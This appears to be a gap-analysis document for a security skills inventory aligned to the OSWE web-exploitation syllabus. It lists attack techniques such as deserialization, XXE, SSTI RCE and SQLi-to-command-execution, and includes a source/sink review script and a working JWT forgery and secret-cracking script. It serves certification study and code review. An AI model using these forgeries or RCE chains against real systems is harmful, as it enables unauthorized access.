Overview
Cross-referencing the existing skills inventory against the snoopysecurity/OSWE-Prep guide (AWAE/OSWE certification syllabus) reveals significant gaps in white-box web application exploitation coverage. The following skills are missing and block end-to-end mastery of OSWE exam topics.
Gap Analysis
Existing web/appsec coverage:
dast-zap, dast-nuclei, dast-ffuf, sast-semgrep, sast-bandit, api-mitmproxy, api-spectral, sca-blackduck, webapp-sqlmap (automated only)
Not covered: manual exploitation chains, deserialization, XXE, SSTI, file upload bypass, source code review methodology, Burp Suite advanced usage, auth bypass, advanced XSS chaining.
Priority Skill List
P0 — Core OSWE Exam Skills (Blockers)
1. appsec/proxy-burpsuite
The primary tool for OSWE. Must cover: intercepting proxy, Intruder (cluster bomb, pitchfork), Repeater, active/passive scanning (Pro only), BApp Store extensions (Turbo Intruder, Auth Analyzer) and writing custom extensions, match-and-replace rules, session handling rules, macro recording.
- Frameworks: OWASP, CWE-200
- OSWE relevance: used in every single exam challenge
2. appsec/codereview-webapp
White-box source code review methodology — the core skill differentiating OSWE from black-box certs. Must cover: taint analysis workflows for PHP/Java/.NET/Node.js, dangerous function mapping (eval, unserialize, Runtime.exec, Process.Start), data-flow tracing from source to sink, grep patterns for common vulnerability classes, IDE setup (VSCodium + CodeQL), building a mental model of an unfamiliar codebase.
- Frameworks: OWASP Code Review Guide v2, CWE-20, CWE-116
- OSWE relevance: every challenge is white-box
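The "grep patterns for common vulnerability classes" step above is the first thing to automate when dropped into an unfamiliar codebase. The script below is an added example for this list, not code from the OSWE-Prep guide: it walks a source tree, flags taint sources and dangerous sinks per language, and prints file:line so each hit can be traced to its sink. The source/sink regexes are a constructed starter set, and the two sample files it scans are constructed for the demo.

```python
"""Quick source/sink triage over an unfamiliar web codebase (added example, not from the prep guide)."""
import os
import re
import tempfile

# Taint sources (attacker-controlled input) and dangerous sinks per file extension.
# Constructed starter lists; a real review extends them per framework and ORM.
SOURCES = {
    ".php": [r"\$_(GET|POST|REQUEST|COOKIE|FILES)\b", r"php://input"],
    ".java": [r"\.getParameter\s*\(", r"\.getHeader\s*\(", r"\.getInputStream\s*\("],
    ".cs": [r"Request\.(Form|QueryString|Params|Cookies)\b"],
    ".js": [r"\breq\.(body|query|params|cookies)\b"],
}
SINKS = {
    ".php": [r"\beval\s*\(", r"\bunserialize\s*\(", r"\b(system|exec|shell_exec|passthru|popen)\s*\(",
             r"\b(include|require)(_once)?\b", r"\bmysqli?_query\s*\("],
    ".java": [r"Runtime\.getRuntime\(\)\.exec\s*\(", r"new\s+ProcessBuilder\s*\(",
              r"\.readObject\s*\(", r"\.createStatement\s*\(", r"DocumentBuilderFactory\.newInstance"],
    ".cs": [r"Process\.Start\s*\(", r"\bBinaryFormatter\b", r"TypeNameHandling\.(All|Auto|Objects)",
            r"new\s+SqlCommand\s*\("],
    ".js": [r"\beval\s*\(", r"new\s+Function\s*\(", r"child_process", r"\.unserialize\s*\("],
}


def _compile(table):
    return {ext: [re.compile(p) for p in pats] for ext, pats in table.items()}


def find_taint_points(root):
    """Return [(relpath, lineno, kind, pattern, line)] for every source/sink hit under root."""
    sources, sinks = _compile(SOURCES), _compile(SINKS)
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            ext = os.path.splitext(name)[1]
            if ext not in sinks:
                continue  # only languages we have patterns for
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for kind, table in (("source", sources), ("sink", sinks)):
                        for pat in table.get(ext, []):
                            if pat.search(line):
                                hits.append((rel, lineno, kind, pat.pattern, line.strip()))
    return hits


# Constructed sample tree: a PHP source->sink pair two lines apart, and a Java parameter->exec pair.
SAMPLE_FILES = {
    "app/import.php": (
        "<?php\n"
        "$blob = $_POST['profile'];\n"
        "$profile = unserialize(base64_decode($blob));\n"
        "echo 'imported';\n"
    ),
    "src/Runner.java": (
        "public class Runner {\n"
        "    void run(javax.servlet.http.HttpServletRequest r) throws Exception {\n"
        "        String cmd = r.getParameter(\"cmd\");\n"
        "        Runtime.getRuntime().exec(cmd);\n"
        "    }\n"
        "}\n"
    ),
    "README.md": "not scanned\n",
}


def demo():
    """Write the constructed tree to a temp dir, scan it, print and return the hits."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_FILES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        hits = find_taint_points(root)
    for rel, lineno, kind, pattern, line in hits:
        print(f"{kind:6} {rel}:{lineno}  {line}   [{pattern}]")
    return hits


if __name__ == "__main__":
    demo()
```

Point it at a real tree with `find_taint_points("/path/to/webroot")`; a source and a sink in the same function (as in the two sample files) is where manual data-flow tracing starts, and everything else is a lower-priority lead.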
P1 — Major Vulnerability Classes
3. appsec/exploit-deserialization
Deserialization exploitation across all OSWE-targeted languages. Must cover: Java (ysoserial, gadget chains, SerializationDumper), PHP (phpggc, __wakeup/__destruct chain construction, PHAR deserialization), .NET (ysoserial.net, ViewState attacks, JSON.NET gadgets), Node.js (node-serialize, prototype pollution). Include payload generation scripts per platform.
- Frameworks: CWE-502, OWASP A08:2021
- OSWE machines: Arkham (Java), Json (.NET), Celestial (Node), dev/random/pipe (PHP)
4. appsec/vuln-xxe
XXE injection testing and exploitation. Must cover: classic file read, blind XXE via OOB (DNS/HTTP callback), SSRF pivot via XXE, XXE-to-RCE via PHP expect://, SVG/XLSX/DOCX XXE vectors, XXE in SOAP/REST/XML APIs, entity expansion (billion laughs), WAF bypass techniques. Tooling: XXEinjector, manual payloads, GoSecure XXE workshop exercises.
- Frameworks: CWE-611, OWASP A05:2021
- OSWE relevance: dedicated OSWE module; XXE-Study lab
5. appsec/vuln-ssti
Server-Side Template Injection across all major engines. Must cover: detection methodology (polyglot payloads), engine fingerprinting decision tree, RCE payloads for Jinja2, Twig, Freemarker, Smarty, Velocity, Pebble, Mako. Tooling: SSTImap, tplmap. Include sandbox escape techniques and GoSecure SSTI workshop.
- Frameworks: CWE-94, OWASP A03:2021
- OSWE relevance: GoSecure Template Injection Workshop is listed prep material
P2 — Exploitation Chains & Bypass Techniques
6. appsec/vuln-fileupload
File upload bypass and exploitation. Must cover: extension bypass (double extension, null byte, MIME spoofing, content-type manipulation), .htaccess / web.config upload for execution context, zip slip / path traversal in archive extraction, image polyglot payloads, client-side validation bypass, ImageMagick delegate and Ghostscript processing exploits. References: PayloadsAllTheThings upload section.
- Frameworks: CWE-434, OWASP A04:2021
- OSWE machines: Popcorn, Vault
7. appsec/vuln-authbypass
Authentication bypass techniques. Must cover: PHP type juggling (== vs ===, magic hash strings, strcmp() bypass), JWT attacks (none algorithm, weak secret brute-force with hashcat -m 16500, algorithm confusion RS256→HS256), password reset logic flaws, race conditions in auth flows, horizontal/vertical authorization testing, account takeover chains. Script: jwt_tool.
- Frameworks: CWE-287, CWE-303, OWASP A07:2021
- OSWE machines: Cereal, Falafel; ATutor auth bypass writeup
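The three JWT attacks listed above all come down to a verifier that lets the token's own header choose the algorithm. The script below is an added example, not from the prep guide, jwt_tool or any listed machine: it builds tokens with the standard library only, models the vulnerable verifier beside a pinned-algorithm one, and includes a wordlist check for weak HS256 secrets. The RSA "public key" is a constructed placeholder standing in for whatever the target exposes (JWKS endpoint, TLS certificate, leaked config); real RS256 verification is omitted because the attacks never reach it.

```python
"""JWT forgery against weak verifiers: alg=none, RS256->HS256 key confusion, weak HS256 secrets.

Added example, not from the prep guide. The verifiers model library misuse, not a specific library.
"""
import base64
import hashlib
import hmac
import json

# Constructed placeholder; on an engagement this is the target's real RSA public key PEM bytes.
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nEXAMPLE-ONLY-NOT-A-REAL-KEY\n-----END PUBLIC KEY-----\n"


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_jwt(header, payload, key=b""):
    """Build header.payload.signature for alg none or HS256 (the two the attacks need)."""
    h = b64url(json.dumps(header, separators=(",", ":")).encode())
    p = b64url(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{h}.{p}".encode()
    alg = header.get("alg", "").lower()
    if alg == "none":
        sig = b""  # unsigned token: three segments, empty third
    elif alg == "hs256":
        sig = hmac.new(key, signing_input, hashlib.sha256).digest()
    else:
        raise ValueError("this example only signs none/HS256")
    return f"{h}.{p}.{b64url(sig)}"


def _split(token):
    h, p, s = token.split(".")
    return h, p, s, json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def weak_verify(token, key_material):
    """Vulnerable pattern: trusts the header's alg and feeds one key blob to whatever it names."""
    h, p, s, header, claims = _split(token)
    alg = header.get("alg", "")
    if alg.lower() == "none":                                   # bug 1: unsigned tokens accepted
        return claims
    if alg == "HS256":                                          # bug 2: public key reused as HMAC secret
        expected = hmac.new(key_material, f"{h}.{p}".encode(), hashlib.sha256).digest()
        return claims if hmac.compare_digest(expected, b64url_decode(s)) else None
    return None  # RS256 path omitted (needs an RSA library); the attacks never reach it


def strict_verify(token, expected_alg, keys):
    """Hardened: alg pinned by the server, one key per alg, 'none' never accepted."""
    h, p, s, header, claims = _split(token)
    if header.get("alg") != expected_alg or expected_alg == "none":
        return None
    if expected_alg == "HS256":
        expected = hmac.new(keys["HS256"], f"{h}.{p}".encode(), hashlib.sha256).digest()
        return claims if hmac.compare_digest(expected, b64url_decode(s)) else None
    return None  # RS256 would dispatch to an RSA verifier with keys["RS256"] here


def forge_none(claims, alg_spelling="none"):
    """Try 'none', 'None', 'NONE', 'nOnE': case-insensitive alg checks are a known bypass."""
    return encode_jwt({"alg": alg_spelling, "typ": "JWT"}, claims)


def forge_confusion(claims, public_key_pem):
    """RS256->HS256: HMAC-sign with the public key bytes the server will also use as the secret."""
    return encode_jwt({"alg": "HS256", "typ": "JWT"}, claims, key=public_key_pem)


def crack_hs256(token, candidates):
    """Offline secret guessing for HS256 (what hashcat -m 16500 does at scale)."""
    h, p, s, _, _ = _split(token)
    sig = b64url_decode(s)
    for secret in candidates:
        if hmac.compare_digest(hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest(), sig):
            return secret
    return None


def demo():
    claims = {"sub": "1", "role": "admin"}
    t_none = forge_none(claims, "None")
    t_conf = forge_confusion(claims, PUBLIC_KEY_PEM)
    t_weak = encode_jwt({"alg": "HS256", "typ": "JWT"}, claims, key=b"secret123")
    return {
        "weak_accepts_none": weak_verify(t_none, PUBLIC_KEY_PEM),
        "weak_accepts_confusion": weak_verify(t_conf, PUBLIC_KEY_PEM),
        "strict_rejects_none": strict_verify(t_none, "RS256", {}),
        "strict_rejects_confusion": strict_verify(t_conf, "RS256", {}),
        "cracked_secret": crack_hs256(t_weak, [b"password", b"secret", b"secret123"]),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

In source review the tell-tale is a verify() call that receives the key but not an explicit algorithm list; the exact PEM byte layout (trailing newline or not) matters for the confusion attack, so try the key as served and as re-encoded by the library.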
8. appsec/vuln-sqli-manual
Manual SQL injection exploitation beyond sqlmap. Must cover: blind boolean-based (custom binary search scripts), time-based blind (MySQL SLEEP, MSSQL WAITFOR), stacked queries (support varies by DBMS and driver), second-order / persistent SQLi, LOAD_FILE / INTO OUTFILE for file R/W, MSSQL xp_cmdshell RCE chain (re-enabling it via sp_configure), PostgreSQL COPY TO/FROM PROGRAM RCE. Include Python exploit scripting patterns (requests + binary search).
- Frameworks: CWE-89, OWASP A03:2021
- OSWE machines: Unattended (MySQL), Fighter (MSSQL), Falafel (MySQL + type juggling)
9. appsec/vuln-xss
Advanced XSS exploitation chains. Must cover: XSS-to-account-takeover methodology, stored vs reflected payload placement, cookie theft and the alternatives when HttpOnly blocks it (in-page JS keylogger, form hijack, driving authenticated requests from the victim's browser), CSP bypass techniques, DOM-based XSS sinks (innerHTML, eval, document.write), XSS combined with MySQL FILE (PentesterLab exercise), self-XSS escalation, BeEF framework basics.
- Frameworks: CWE-79, OWASP A03:2021
- OSWE relevance: PentesterLab "XSS and MySQL FILE" is listed prep lab
P3 — Supporting Exploitation Skills
10. offsec/exploit-pywebscript
Python exploit script development for web vulnerabilities. Must cover: building single-file exploit scripts with requests (session handling, CSRF token extraction, redirect following), pwntools for binary-adjacent web exploits, automating blind SQLi/blind XXE, scripting multi-step exploit chains (auth → upload → trigger), cookie/header manipulation, regex-based response parsing. References: HTB AWAE scripts repo, PortSwigger SQLi script collection, blindSQLir.
- Frameworks: MITRE ATT&CK T1190
- OSWE relevance: OSWE exam requires submitting a single working exploit script per challenge
Suggested Implementation Order
| # | Skill | Category | Effort | OSWE Weight |
|---|-------|----------|--------|-------------|
| 1 | proxy-burpsuite | appsec | High | Critical |
| 2 | codereview-webapp | appsec | High | Critical |
| 3 | exploit-deserialization | appsec | High | High |
| 4 | vuln-xxe | appsec | Medium | High |
| 5 | vuln-ssti | appsec | Medium | High |
| 6 | vuln-sqli-manual | appsec | Medium | High |
| 7 | vuln-authbypass | appsec | Medium | Medium |
| 8 | vuln-fileupload | appsec | Medium | Medium |
| 9 | vuln-xss | appsec | Medium | Medium |
| 10 | exploit-pywebscript | offsec | Low | High |
Reference Sources